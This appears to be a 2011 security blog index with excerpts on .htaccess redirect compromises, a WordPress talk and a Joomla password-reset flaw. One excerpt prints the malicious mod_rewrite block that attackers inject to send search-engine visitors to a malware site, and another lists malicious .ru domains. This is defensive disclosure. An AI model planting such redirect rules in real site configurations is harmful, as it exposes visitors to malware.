The New (and Old) .htaccess Attacks – Now Using .in Domains

November 28, 2011 by 2 Comments

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:

face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru


Read More

Filed Under: hacked, htaccess, Malware, malware_updates, WordPress Tagged With: , , , , ,

Dre Armeda: WordPress End-User Security

November 19, 2011 by 6 Comments

Sucuri Co-Founder Dre Armeda did a great presentation at WordCamp Chicago about end-user security for WordPress users.

Check out the video here:

Dre will also be speaking at WordCamp Las Vegas 2011, make sure to say hi if you’re attending.

Filed Under: security, sucuri, WordPress Tagged With: , ,

Joomla 1.5.25/1.7.3 Released (Security Update)

November 15, 2011 by 3 Comments

If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches fixing a high priority security issue that will allow remote users to change other users passwords (even on admin account).

More details on the Joomla website and here.

Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.

Read More

Filed Under: joomla, vulnerability Tagged With: ,

Htaccess Redirection to Sweepstakesandcontestsinfo dot com

November 14, 2011 by 3 Comments

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>


Read More

Filed Under: hacked, htaccess, Malware, malware_updates, vulnerability Tagged With: , , , ,